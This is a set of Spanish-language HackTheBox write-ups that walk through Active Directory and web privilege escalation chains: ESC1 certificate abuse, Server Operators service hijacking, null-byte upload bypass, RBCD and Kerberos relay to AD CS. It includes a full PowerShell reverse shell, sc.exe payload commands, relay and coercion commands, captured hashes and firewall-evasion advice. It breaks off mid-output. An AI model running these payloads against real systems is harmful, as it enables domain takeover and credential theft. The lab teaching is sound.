Con las credenciales de FAKEBOX$ solicito el certificado especificando el UPN de Administrator en el SAN. Esto es el núcleo de ESC1: el template no valida que el solicitante sea realmente el usuario que declara en el certificado.

La CA emite el certificado sin validar la identidad real del solicitante frente al UPN declarado. El resultado es administrator.pfx — un certificado que acredita ser Administrator.

4. Intento de Autenticación PKINIT — Error

El flujo estándar sería usar ese .pfx para obtener un TGT de Kerberos:

Pero el DC responde con:

KDC_ERR_PADATA_TYPE_NOSUPP (KDC has no support for padata type)

El KDC no tiene habilitado PKINIT, así que no puede procesar pre-autenticación basada en certificados. El TGT no se emite. El certificado sigue siendo válido — solo necesito una ruta diferente para usarlo.

5. Extraer el Certificado y la Clave del PFX

La alternativa es usar el certificado para autenticarme directamente contra LDAP en lugar de Kerberos. Para eso necesito el .crt y el .key por separado:

Estos dos archivos me permiten establecer una sesión LDAP autenticada con el certificado del Administrator, sin pasar por Kerberos en ningún momento.

6. PassTheCert — Otorgar DCSync a svc_ldap

Con PassTheCert uso el certificado para autenticarme en LDAP como Administrator y desde ahí modificar el objeto svc_ldap en el directorio, otorgándole permisos de DCSync (DS-Replication-Get-Changes + DS-Replication-Get-Changes-All).

La herramienta confirma: Granted user 'svc_ldap' DCSYNC rights!

Esto funciona porque LDAP sí acepta autenticación por certificado (SASL EXTERNAL / TLS client auth), a diferencia del KDC en este DC. Ahora svc_ldap puede replicar el directorio como si fuera un Domain Controller.

7. DCSync — Dumping de Credenciales

Con los permisos de replicación ya asignados, ejecuto DCSync con secretsdump:

Obtengo los hashes NTLM de todos los usuarios del dominio, incluyendo:

Administrator:500:aad3b435b51404eeaad3b435b51404ee:6961f422924da90a6928197429eea4ed:::

8. Pass-the-Hash → Shell como Administrator

Verifico el hash y me conecto al DC

Resumen de la Cadena de Ataque

svc_ldap (credenciales) 
  → Enumeración AD CS → CorpVPN vulnerable a ESC1
  → Crear FAKEBOX$ (Domain Computer)
  → Solicitar certificado con UPN=administrator@authority.htb
  → PKINIT bloqueado por el DC
  → Extraer .crt y .key del PFX
  → PassTheCert vía LDAP → DCSync rights a svc_ldap
  → secretsdump → Hash NTLM de Administrator
  → Pass-the-Hash → evil-winrm → SYSTEM

Por qué funciona PassTheCert cuando PKINIT no funciona

LDAP acepta el certificado como identidad porque el DC tiene LDAPS activo en el puerto 636, y el certificado lleva el UPN de Administrator como SAN — el directorio lo toma como prueba de identidad válida. No necesita que el KDC lo valide.

BUILTIN\Server Operators (SID: S-1-5-32-549) es un grupo local privilegiado de Windows que existe por defecto en Domain Controllers. A diferencia de grupos como Administrators, este grupo está diseñado para delegar tareas operativas del servidor sin otorgar control total del sistema, pero en la práctica sus permisos abren una superficie de ataque crítica.

Los miembros de este grupo tienen capacidad para:

• Iniciar y detener servicios del sistema
• Modificar la configuración de servicios (incluyendo el binPath)
• Hacer login local en Domain Controllers
• Crear y eliminar shared folders
• Formatear discos
• Hacer backup y restore de archivos (SeBackupPrivilege / SeRestorePrivilege)

El vector de ataque más directo y poderoso es la modificación del binario de un servicio, ya que muchos servicios del sistema corren como NT AUTHORITY\SYSTEM.

Reconocimiento - Identificar la membresía

Al obtener una shell con svc-printer via Evil-WinRM, lo primero que hago es whoami /all para auditar mis grupos y privilegios:

El output relevante fue:

BUILTIN\Server Operators   Alias   S-1-5-32-549   Mandatory group, Enabled by default, Enabled group

Esto es inmediatamente una señal de alarma (positiva para el atacante). El usuario de servicio svc-printer fue configurado en este grupo probablemente para que pudiera gestionar servicios de impresión, pero esa delegación excesiva nos da la palanca para escalar.

El Vector: Modificación del BinPath de un Servicio

¿Por qué funciona esto?

Cuando Windows ejecuta un servicio, lo hace con el contexto del usuario configurado en ese servicio. Los servicios del sistema como VMTools, browser, VSS, etc., corren como NT AUTHORITY\SYSTEM, la cuenta con máximos privilegios en el sistema operativo.

sc.exe es la herramienta nativa de Windows para gestionar servicios. Con sc.exe config puedo modificar el binpath, que es la ruta al ejecutable que se lanza cuando el servicio arranca. Como miembro de Server Operators, tengo permiso para hacer exactamente eso.

La lógica es:

Si puedo cambiar qué ejecutable corre un servicio de SYSTEM, y puedo reiniciar ese servicio, entonces puedo ejecutar cualquier comando como SYSTEM.

Explotación Paso a Paso

1. Selección del servicio objetivo

Elegí VMTools (VMware Tools) porque es un servicio estándar, siempre presente en máquinas virtuales, y corre como SYSTEM. Cualquier servicio del sistema con esas características sirve.

2. Preparar el listener

En mi Kali preparo netcat esperando la conexión entrante:

nc -lvnp 4444

3. Generar el payload

Uso un one-liner de PowerShell para reverse shell, codificado en Base64 (UTF-16LE) porque el parámetro -EncodedCommand de PowerShell lo requiere así. El payload en texto claro es:

$client = New-Object System.Net.Sockets.TCPClient("10.10.15.15",4444);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);
    $sendback = (iex $data 2>&1 | Out-String);
    $sendback2 = $sendback + "PS " + (pwd).Path + "> ";
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
    $stream.Write($sendbyte,0,$sendbyte.Length);
    $stream.Flush()
};
$client.Close()

4. Modificar el binPath del servicio

sc.exe config VMTools binpath="cmd /c powershell.exe -nop -w hidden -e <BASE64_PAYLOAD>"

El cmd /c es necesario como wrapper porque sc.exe necesita que el binario sea un ejecutable directo, y powershell.exe con sus argumentos necesita pasar por cmd para interpretarse correctamente.

5. Reiniciar el servicio

sc.exe stop VMTools
sc.exe start VMTools

El comando sc.exe start devuelve error 1053 (“The service did not respond to the start or control request in a timely fashion”). Esto es completamente esperado y normal: el servicio no puede reportar que arrancó correctamente porque nuestro payload no implementa la lógica de comunicación con el Service Control Manager. Sin embargo, el comando del binPath ya se ejecutó antes de que expire el timeout.

Resultado

En mi listener recibo la conexión y verifico con whoami /all:

Escalada completa a NT AUTHORITY\SYSTEM

OPSEC: ¿Por qué la reverse shell es mejor que agregar al grupo Administrators?

Una alternativa más simple es:

sc.exe config VMTools binpath="cmd /c net localgroup administrators svc-printer /add"

Esto funciona, pero tiene desventajas desde el punto de vista de OPSEC:

En un engagement real, modificar la membresía de grupos de dominio es una de las acciones más ruidosas posibles: queda en logs de Active Directory, en SIEMs, y cualquier solución de detección decente lo alerta de inmediato. La reverse shell en cambio es una conexión de red saliente que, si el puerto está permitido por el firewall (4444 puede levantarse en 443, 80, o 8443 para mayor evasión), pasa más desapercibida.

Además, con la reverse shell no necesito persistencia: tomo lo que necesito y me voy, minimizando la huella.

Restaurar el servicio (cleanup)

Después de terminar, es buena práctica restaurar el binPath original del servicio para no dejar el sistema roto:

sc.exe config VMTools binpath="C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"
sc.exe start VMTools

Resumen del ataque

svc-printer (Server Operators)
        │
        ▼
sc.exe config VMTools binpath="<payload>"
        │
        ▼
sc.exe stop/start VMTools
        │
        ▼
Servicio ejecuta payload como SYSTEM
        │
        ▼
Reverse shell → NT AUTHORITY\SYSTEM

El problema de fondo es una inconsistencia entre capas. Lenguajes de bajo nivel como C interpretan el \0 como el fin de un string, literalmente dejan de leer ahí. Entonces cuando una aplicación moderna en PHP o Python pasa esos datos hacia una función de bajo nivel, cada capa ve un string distinto con los mismos datos. El validador sigue leyendo normal, la función de abajo corta en el null byte — y en esa brecha el atacante opera.

No está rompiendo nada, está abusando de esa inconsistencia para que el sistema haga dos cosas al mismo tiempo sin darse cuenta. El validador aprueba, el ejecutor hace algo completamente distinto.

Si el sitio no sanitiza bien esos bytes nulos, el atacante puede bypassear controles de seguridad, manipular rutas de archivos, explotar funciones internas o colar archivos maliciosos que el backend termina ejecutando sin que ningún filtro lo haya detectado.

Explotación — Certificate HTB

Para demostrar esto en la práctica, usé la máquina Certificate de HackTheBox.

El sitio tiene un panel de subida de archivos que solo acepta documentos comprimidos en zip — pdf, docx, pptx, xlsx. Además está corriendo en PHP, lo que significa que si logro colar un archivo .php y apuntar a él, el servidor lo va a interpretar y ejecutar.

Ahí es donde entra el Null Byte Injection.

Creando el archivo malicioso

Creo mi archivo en PHP, un archivo malicioso que al ser interpretado por el servidor le dice que se conecte de vuelta a mi máquina en el puerto 443 — eso es una reverse shell, la conexión sale del servidor hacia mí, lo que me permite evadir firewalls que bloquean conexiones entrantes.

Pero acá viene el problema — si subo el archivo como evil.php dentro del zip, el validador lo va a rechazar de inmediato porque no es un formato permitido. Entonces lo que hago es nombrar mi archivo evil.php..pdf. Le coloco dos puntos antes de pdf y no uno solo, y eso es intencional por una razón muy específica.

Necesito que al momento de inyectar el null byte, el nombre del archivo quede limpio del lado del sistema. Si solo pusiera evil.php.pdf y reemplazara ese único punto por \0, quedaría evil.php\0pdf — sin punto antes de la extensión, un nombre roto que el sistema no va a manejar bien. En cambio con evil.php..pdf, cuando reemplazo el primer punto por \0 queda evil.php\0.pdf — uno de los puntos lo sacrifico como null byte y el otro se queda cumpliendo su función natural, ser el punto de la extensión .pdf. El validador lee el string completo y ve .pdf , todo tranquilo.

Modificando el ZIP en hexadecimal

Ahora abro ese zip con hexedit, que me permite ver y editar la data cruda del archivo en hexadecimal. Dentro del zip el nombre del archivo está almacenado en dos lugares — en el header local y en el central directory, que es básicamente el índice interno del zip que le dice al sistema qué archivos contiene y dónde están. En ambos lugares busco el nombre evil.php..pdf y localizo los dos puntos representados en hex como 2E 2E. Reemplazo el primer 2E por 00 en las dos ocurrencias. Si no lo hago en ambas, el zip queda inconsistente y puede fallar al extraerse.

Subiendo el archivo y obteniendo la shell

Ahora el zip contiene evil.php\0.pdf. Subo el zip, el validador ve .pdf y lo aprueba sin levantar ninguna alerta.

Pero cuando el backend extrae el archivo y lo pasa al sistema de archivos — que por debajo usa funciones escritas en C — ese \0 es interpretado como fin de cadena y el archivo queda guardado físicamente como evil.php. Esa es exactamente la inconsistencia que explotamos — el validador y el sistema de archivos leyeron los mismos bytes y llegaron a conclusiones completamente distintas.

Voy a la URL donde quedó almacenado el archivo, apunto directo a evil.php, le hago un curl y el servidor lo encuentra, lo interpreta como PHP y ejecuta el código malicioso. En mi listener con netcat recibo la conexión — shell dentro del servidor, corriendo como el usuario de XAMPP.

Conclusión

Y así, mediante una mala configuración del backend que no sanitiza correctamente los bytes nulos en los nombres de archivo, logré vulnerar el sitio — pasando de simplemente subir un documento a tener ejecución remota de código en el servidor.

¿Por qué importa para el ataque? AD tiene un atributo llamado msDS-AllowedToActOnBehalfOfOtherIdentity en los objetos de equipo/servicio. Este atributo define quién puede actuar en nombre de otros usuarios hacia ese recurso.

El punto clave: Si un atacante tiene permisos para escribir ese atributo en un objeto (cosa que las cuentas máquina suelen tener sobre sí mismas u otros objetos), puede modificarlo para que una cuenta que él controle quede autorizada a impersonar a cualquier usuario del dominio hacia ese servicio — incluyendo administradores.

RBCD – Flujo del Ataque

1. Compromiso inicial Primero necesito una cuenta con permisos de escritura sobre atributos de un objeto en AD. Puede ser una cuenta máquina, o cualquier cuenta con GenericWrite, WriteDACL o AllExtendedRights sobre el objeto objetivo. Sin esto no arranca nada — es el punto de entrada obligatorio.

2. Modifico el atributo Con esa cuenta escribo en msDS-AllowedToActOnBehalfOfOtherIdentity del objeto objetivo y meto mi cuenta controlada. Lo que hago acá es decirle a AD de forma legítima: “esta cuenta mía tiene permiso para actuar en nombre de cualquier usuario hacia este objeto”. Kerberos lo ve como configuración válida, no como ataque.

3. Obtengo un TGT Con mi cuenta controlada le pido un TGT al KDC. Este ticket es mi identidad dentro de Kerberos — sin él no puedo hacer los pasos siguientes. Es la base de toda la cadena.

4. S4U2Self → me hago pasar por el usuario objetivo Uso la extensión S4U2Self para pedirle al KDC un TGS como si yo fuera Administrator. El KDC me lo da porque mi cuenta está autorizada en el atributo que modifiqué. Todavía no accedo a nada — solo tengo un ticket que dice que soy Admin.

5. S4U2Proxy → ticket válido hacia el servicio Con ese ticket uso S4U2Proxy para convertirlo en un TGS válido hacia el servicio o recurso objetivo — CIFS, HTTP, LDAP, lo que sea. El KDC lo valida porque todo el flujo está dentro de la delegación que yo mismo configuré en el paso 2.

6. Accedo como DA Presento ese TGS y entro al recurso impersonando a Administrator. Para el sistema todo fue legítimo — Kerberos hizo su trabajo normal. Yo solo abusé de a quién le di permiso de delegar.

Voy a usar la máquina Rebound de Hack The Box para demostrar el ataque en acción ya que en esta maquina se debe efectuar este ataque para la escalada de privilegios

El punto de partida

Ya tengo credenciales de dos cuentas que necesito para esto. Arranco con DELEGATOR$, una cuenta máquina. Tenía el AD mapeado en BloodHound de recolecciones previas, así que fui directo a ver qué vectores me daba esta cuenta — y lo que encuentro es que tiene AllowedToDelegate hacia DC01. Traducido: esta cuenta tiene permiso para presentarse ante el DC como si fuera otro usuario, eso es exactamente lo que necesito para el ataque.

Primer intento — el error que me reorienta

Con esa info en mano intento impersonar a Administrator. Uso el SPN HTTP/DC01.rebound.htb y pongo cifs como alternativa por si el primero no jalaba, tiro el hash de DELEGATOR$ y lanzo el ataque. Todo arranca — obtiene el TGT, declara que va a impersonar a Administrator, hace el proceso completo — y en el último paso truena con KDC_ERR_BADOPTION.

El error me da dos posibles causas: o ese SPN no tiene permitido delegar desde DELEGATOR$, o el TGT que obtuve no es reenvíable. Esto segundo es lo crítico — para que el ataque cierre, Kerberos necesita que el TGT sea reenvíable porque es lo que le permite tomar ese ticket y convertirlo en uno válido hacia el servicio que quiero atacar. Si el TGT no tiene esa propiedad, Kerberos corta ahí y no hay nada que hacer con ese camino. Toca buscar otro ángulo.

Configurando la Delegación — El Ataque Arranca

Acá es donde el RBCD empieza de verdad. Como mencioné, cuento con credenciales de dos cuentas: DELEGATOR$ la cuenta máquina, y ldap_monitor.

Uso impacket-rbcd para configurar la delegación. Le paso el hash de DELEGATOR$, especifico que todo vaya por Kerberos con -k, le digo desde dónde quiero delegar con -delegate-from ldap_monitor, hacia dónde con -delegate-to delegator$, la acción es write, le paso la IP del DC y especifico que use LDAP.

Con eso el ataque escribe el atributo msDS-AllowedToActOnBehalfOfOtherIdentity directamente en el objeto DELEGATOR$, apuntando a ldap_monitor. Traducido: le estoy diciendo al Active Directory que ldap_monitor tiene permitido impersonar a cualquier usuario hacia DELEGATOR$ mediante S4U2Proxy. Primer paso completado.

Obteniendo los Tickets — La Cadena Final

TGT para ldap_monitor

Primero obtengo un TGT para ldap_monitor — este es mi punto de partida y es lo que me permite operar como esa cuenta dentro de Kerberos. Sin él no puedo arrancar nada de lo que sigue.

impacket-getTGT 'rebound.htb/ldap_monitor:1GR8t@$$4u'
[*] Saving ticket in ldap_monitor.ccache

Primer ST — impersonando a DC01

Con el TGT de ldap_monitor solicito un ST usando el SPN browser/dc01.rebound.htb — ese SPN pertenece a DELEGATOR$ y es exactamente donde configuré la delegación antes. La idea acá es abusar de esa delegación para que Kerberos me emita un ticket como si fuera DC01$. Uso el TGT de ldap_monitor por Kerberos sin password porque ya tengo el ticket cargado.

KRB5CCNAME=ldap_monitor.ccache impacket-getST -spn "browser/dc01.rebound.htb" -impersonate "dc01\$" "rebound.htb/ldap_monitor" -k -no-pass
[*] Saving ticket in dc01\$@browser\_dc01.rebound.htb@REBOUND.HTB.ccache

Lo obtengo — pero este ticket todavía no me sirve para el DCSync. Está limitado al SPN de DELEGATOR$, y para poder volcar credenciales del DC necesito un ticket válido bajo el SPN del propio DC01. Este primer ST es el trampolín para llegar ahí.

Segundo ST — el que cierra el juego

Uso ese primer ST como ticket adicional con -additional-ticket y solicito un nuevo ST, esta vez bajo el SPN http/dc01.rebound.htb, impersonando a DC01$ y autenticándome con las credenciales de DELEGATOR$ por Kerberos. Lo que hago acá es encadenar los dos tickets — el primero me acredita como DC01$, el segundo convierte eso en acceso real al DC. Este es el ticket final.

Con ese ST ejecuto un DCSync con secretsdump apuntando directo al hash del Administrator — y lo obtengo limpio. El DCSync funciona porque estoy operando como DC01$, una cuenta máquina del dominio que tiene permisos de replicación por defecto — exactamente lo que necesita el ataque para volcar credenciales sin tocar el DC directamente.

Validación y acceso total

Compruebo el hash con netexec por SMB y este es válido.

Y así, abusando de la lógica legítima de Kerberos y sin explotar ninguna vulnerabilidad clásica, logré comprometer completamente este entorno de Active Directory.

Aquí es donde entra el Kerberos Relay. La idea es simple pero letal: si puedo hacer que esa cuenta se autentique contra algo que yo controlo, puedo capturar esa autenticación Kerberos y relayarla (redirigirla) hacia otro servicio, en este caso Active Directory Certificate Services (ADCS).

¿Por qué ADCS? Porque si logro que ADCS me dé un certificado válido usando la autenticación robada, ese certificado me permite autenticarme como la cuenta de servicio sin necesitar su contraseña. Y una vez tengo eso, puedo abusar de sus privilegios para escalar hasta Domain Admin.

El grupo DNSAdmins es clave aquí porque me permite crear registros DNS falsos en el dominio. Eso significa que puedo hacer que las máquinas del dominio intenten conectarse a un servidor controlado por mí pensando que es legítimo. Cuando lo hacen, capturó la autenticación Kerberos y arranca toda la cadena.

Contexto del Ataque - Máquina DarkCorp (HTB)

Para demostrar este ataque voy a estar usando la máquina DarkCorp de HackTheBox, donde precisamente se explota esta cadena para escalar privilegios hasta Domain Admin.

El punto de entrada: Forzando tráfico desde svc_acc

Primero, necesito entender cómo puedo hacer que la cuenta svc_acc genere tráfico hacia mí para poder capturar y relayar su autenticación.

En esta máquina hay un servicio web corriendo en el puerto 5000. En el dashboard, específicamente en la sección “Check Status”, hay un panel que permite verificar el estado de un dominio.

La clave aquí es simple: si ese panel está verificando si un dominio está activo, por detrás tiene que estar enviando una solicitud HTTP. Y si hay una solicitud, hay una cuenta generando tráfico. Esa cuenta es svc_acc

Redirigiendo el tráfico con socat

Ahora viene la parte interesante. Anteriormente había logrado acceso al sistema con una shell como el usuario postgres, que está en un entorno Linux pero dentro de la red interna del DC. Esto es clave porque puedo usar esa sesión como puente.

Lo que hago es usar socat para redirigir todo el tráfico del puerto 8080 de la red interna hacia mi puerto 80 en mi máquina atacante:

postgres@drip:/dev/shm$ ./socat TCP-LISTEN:8080,reuseaddr,fork TCP:10.10.15.127:80

Básicamente, cualquier solicitud que llegue al puerto 8080 en la red interna, termina llegando directamente a mí. Esto también se puede hacer con cualquier cuenta que esté en la red interna del DC, no necesariamente tiene que ser postgres.

Capturando el hash NTLMv2 con Responder

Con el tráfico ya redirigido hacia mí, levanto Responder en mi interfaz tun0. Responder es una herramienta que envenena la red y cuando recibe solicitudes, obliga al cliente a resolver un reto de autenticación NTLM, capturando así el hash NTLMv2.

Activo Responder y desde la web le doy a “Check!” apuntando al dominio drip.darkcorp.htb:8080. En cuestión de segundos, Responder captura el hash

┌──(.env)─(root㉿kali)-[/home/kali/Downloads/Responder]
└─# python3 Responder.py -I tun0
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|


[*] Tips jar:
    USDT -> 0xCc98c1D3b8cd9b717b5257827102940e4E17A19A
    BTC  -> bc1q9360jedhhmps5vpl3u05vyg4jryrl52dmazz49

[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    MDNS                       [ON]
    DNS                        [ON]
    DHCP                       [OFF]
    DHCPv6                     [OFF]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    MQTT server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]
    SNMP server                [ON]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Force ESS downgrade        [OFF]

[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.10.15.127]
    Responder IPv6             [fe80::e318:5d01:b5cd:50cd]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP', 'ISATAP.LOCAL']
    Don't Respond To MDNS TLD  ['_DOSVC']
    TTL for poisoned response  [default]

[+] Current Session Variables:
    Responder Machine Name     [WIN-M3PN69P4XUZ]
    Responder Domain Name      [MJFV.LOCAL]
    Responder DCE-RPC Port     [48356]

[*] Version: Responder 3.2.2.0
[*] Author: Laurent Gaffie, <lgaffie@secorizon.com>

[+] Listening for events...                                                                                                                                                                 

[HTTP] NTLMv2 Client   : 10.129.232.7
[HTTP] NTLMv2 Username : darkcorp\svc_acc
[HTTP] NTLMv2 Hash     : svc_acc::darkcorp:5fd46f0d0832cfc1:C60DA4FDA6DB8F96B3D81BA15B76BAD9:010100000000000033C54535D591DC0115ED0A7CC51BF7F600000000020008004D004A004600560001001E00570049004E002D004D00330050004E003600390050003400580055005A00040014004D004A00460056002E004C004F00430041004C0003003400570049004E002D004D00330050004E003600390050003400580055005A002E004D004A00460056002E004C004F00430041004C00050014004D004A00460056002E004C004F00430041004C0008003000300000000000000000000000003000006974F8F84286AE2439510D4BB467DAC5FE01251AB20F6353EB5B85F0E1EAB6930A0010000000000000000000000000000000000009002C0048005400540050002F0064007200690070002E006400610072006B0063006F00720070002E006800740062000000000000000000                                               
[*] Skipping previously captured hash for darkcorp\svc_acc

Tengo el hash de darkcorp\svc_acc, la cuenta de servicio que está haciendo las verificaciones por detrás

¿Y si no puedo crackear el hash?

Aunque este hash no se pudo crackear con diccionarios, no es el final del camino. Aquí es donde entra el Kerberos Relay. En lugar de intentar romper el hash, puedo aprovechar directamente esa autenticación que está generando svc_acc y relayarla hacia otro servicio, específicamente hacia ADCS, para obtener algo mucho más valioso: un certificado válido.

Y ahí es donde la cosa se pone realmente interesante.

Abusando de DNSAdmins para crear el vector de ataque

Aquí es donde la cosa se pone realmente interesante. Al revisar en BloodHound los grupos a los que pertenece svc_acc (había recolectado información del AD anteriormente), noto algo clave: esta cuenta es miembro del grupo DNSAdmins.

Esto es crítico porque pertenecer a DNSAdmins me permite crear registros DNS en el dominio apuntando a mi IP. Con eso puedo hacer que cuando las máquinas del dominio intenten resolver ese nombre, terminen conectándose a mí. Y cuando eso pase, capturo la autenticación Kerberos y la relaeo hacia ADCS para obtener un certificado válido.

Para entender bien esta técnica, me basé en este artículo de Synacktiv sobre Relaying Kerberos over SMB using krbrelayx.

Creando el registro DNS malicioso

Lo primero que hago es levantar ntlmrelayx apuntando contra LDAP para crear el registro DNS

┌──(kali㉿kali)-[~/Desktop/HTB/dark/content]
└─$ proxychains impacket-ntlmrelayx -t ldap://172.16.20.1 --add-dns-record dc-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA 10.10.15.127
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Protocol Client MSSQL loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client WINRMS loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client SMB loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server on port 445
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server on port 9389
[*] Setting up RAW Server on port 6666
[*] Setting up WinRM (HTTP) Server on port 5985
[*] Setting up WinRMS (HTTPS) Server on port 5986
[*] Setting up RPC Server on port 135
[*] Multirelay disabled

[*] Servers started, waiting for connections

¿Por qué ese nombre DNS tan largo y extraño?

Ese nombre (dc-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA) no es aleatorio. Es una estructura serializada en Base64 que engaña al sistema de autenticación Kerberos de Windows.

El truco funciona así:

1. Estructura serializada: Ese nombre largo contiene una estructura CREDENTIAL_TARGET_INFORMATION codificada.
2. Explotación del mecanismo: Cuando un cliente SMB construye el SPN (Service Principal Name), Windows usa la función SecMakeSPNEx2, que internamente llama a CredMarshalTargetInfo y agrega esa información al final del SPN.
3. El engaño clave:
   • El cliente solicita un ticket Kerberos para un servicio legítimo (como cifs/fileserver)
   • Pero se conecta físicamente al servidor con el nombre largo (el mio)
   • Windows llama a CredUnmarshalTargetInfo para procesar los datos
   • Elimina automáticamente esa parte larga del final, restaurando el SPN original
   • El paquete Kerberos contiene el nombre legítimo, pero la conexión TCP va a mi servidor

Es básicamente un bypass del mecanismo de validación de Kerberos. Windows cree que está conectándose a algo legítimo, pero termina hablando conmigo.

Con ntlmrelayx levantado y esperando conexiones, vuelvo a la web y genero tráfico nuevamente haciendo clic en “Check!”. Esta vez, en lugar de solo capturar el hash, relaeo la autenticación completa hacia LDAP

*] (HTTP): Client requested path: /
[*] (HTTP): Client requested path: /
[*] (HTTP): Client requested path: /
[*] (HTTP): Connection from 10.129.232.7 controlled, attacking target ldap://172.16.20.1
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.16.20.1:389  ...  OK
[*] (HTTP): Client requested path: /
[*] (HTTP): Authenticating connection from DARKCORP/SVC_ACC@10.129.232.7 against ldap://172.16.20.1 SUCCEED [1]
[*] ldap://DARKCORP/SVC_ACC@172.16.20.1 [1] -> Enumerating relayed user's privileges. This may take a while on large domains
[*] ldap://DARKCORP/SVC_ACC@172.16.20.1 [1] -> Checking if domain already has a `dc-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA` DNS record
[*] ldap://DARKCORP/SVC_ACC@172.16.20.1 [1] -> Domain does not have a `dc-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA` record!
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.16.20.1:53  ...  OK
[*] ldap://DARKCORP/SVC_ACC@172.16.20.1 [1] -> Adding `A` record `dc-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA` pointing to `10.10.15.127` at `DC=dc-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA,DC=darkcorp.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=darkcorp,DC=htb`
[*] ldap://DARKCORP/SVC_ACC@172.16.20.1 [1] -> Added `A` record `dc-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA`. DON'T FORGET TO CLEANUP (set `dNSTombstoned` to `TRUE`, set `dnsRecord` to a NULL byte)
[*] ldap://DARKCORP/SVC_ACC@172.16.20.1 [1] -> Dumping domain info for first time
[*] ldap://DARKCORP/SVC_ACC@172.16.20.1 [1] -> Domain info dumped into lootdir!

Perfecto. La autenticación fue exitosa, ntlmrelayx se autenticó en LDAP como svc_acc y creó el registro DNS apuntando a mi IP. Ahora cualquier máquina que intente resolver ese nombre, terminará conectándose a mí

Relayando Kerberos hacia ADCS y obteniendo el certificado

Ahora viene la parte final del ataque. Lo siguiente es levantar krbrelayx, que será quien capture la autenticación Kerberos y la relaee directamente hacia AD CS para solicitar un certificado.

Lo configuro apuntando al endpoint de Certificate Services

┌──(.env)─(root㉿kali)-[/home/kali/Downloads/krbrelayx]
└─# proxychains python3 krbrelayx.py -t 'https://dc-01.darkcorp.htb/certsrv/certfnsh.asp' --adcs --template Machine -v 'WEB-01$' -dc-ip 172.16.20.1
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
/home/kali/Downloads/krbrelayx/lib/clients/__init__.py:17: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
  import os, sys, pkg_resources
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client SMB loaded..
[*] Running in attack mode to single host
[*] Running in kerberos relay mode because no credentials were specified.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server

[*] Servers started, waiting for connections

Parámetros clave:

• -t: Target, el endpoint web de ADCS
• --adcs: Modo ADCS para solicitar certificados
• --template Machine: Plantilla de certificado de máquina (permite autenticación)
• -v 'WEB-01$': Víctima, la cuenta máquina que forzaremos a autenticarse

krbrelayx levanta servidores SMB, HTTP y DNS, quedando a la espera de recibir una autenticación Kerberos válida.

Forzando la autenticación con PetitPotam

Para provocar que una máquina del dominio se autentique contra mí, uso PetitPotam, una técnica que abusa de funciones RPC del servicio de cifrado de archivos (MS-EFSRPC) para forzar autenticación.

Lo apunto al registro DNS malicioso que creé antes

┌──(kali㉿kali)-[~/…/HTB/dark/content/PetitPotam]
└─$ proxychains python3 PetitPotam.py -u victor.r -p 'victor1gustavo@#' -d darkcorp.htb 'dc-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' 172.16.20.2
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
/home/kali/Desktop/HTB/dark/content/PetitPotam/PetitPotam.py:23: SyntaxWarning: invalid escape sequence '\ '
